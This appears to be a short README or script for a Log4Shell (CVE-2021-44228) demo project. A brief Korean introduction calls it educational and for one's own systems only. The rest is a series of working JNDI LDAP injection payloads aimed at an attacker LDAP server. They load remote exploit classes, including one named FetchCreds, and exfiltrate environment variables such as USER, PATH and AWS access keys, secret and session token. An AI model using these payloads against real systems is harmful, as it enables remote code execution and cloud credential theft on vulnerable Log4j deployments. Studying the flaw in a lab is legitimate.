
Log4Shell 취약점(CVE-2021-44228)에 대한 교육용 데모로, 자체 시스템에서 실험적 테스트를 위한 JNDI LDAP 페이로드를 포함합니다.
이 프로젝트는 log4shell 보안 취약점의 작동 방식을 시연하기 위한 것입니다.
이 취약점은 CVE-2021-44228에 설명되어 있습니다.
이 프로젝트는 교육 목적으로만 사용됩니다. 자신의 시스템에서만, 실험 목적으로만 사용해야 합니다.
모든 실행은 사용자 본인의 책임 하에 이루어집니다. 저자는 프로젝트 실행으로 인해 발생하는 사고에 대해 어떠한 책임도 지지 않습니다.
ldap_server=i-09cd4f41e5a2b1d66.eu-west-3.compute.internal:1389
hello '${jndi:ldap://'"${ldap_server}"'/run=log4shell.Exploit}'
hello '${jndi:ldap://'"${ldap_server}"'/run=log4shell.ExploitP,msg=my friend}'
hello '${jndi:ldap://'"${ldap_server}"'/run=log4shell.aws.FetchCreds}'
hello '${jndi:ldap://'"${ldap_server}"'/log=PATH:${env:USER}}'
hello '${jndi:ldap://'"${ldap_server}"'/log=PATH:${env:PATH}}'
hello '${jndi:ldap://'"${ldap_server}"'/log=os=${java:os}}'
hello '${jndi:ldap://'"${ldap_server}"'/log=aws_credentials,AWS_ACCESS_KEY_ID=${env:AWS_ACCESS_KEY_ID},AWS_SECRET_ACCESS_KEY=${env:AWS_SECRET_ACCESS_ID},AWS_SESSION_TOKEN=${env:AWS_SESSION_TOKEN}}'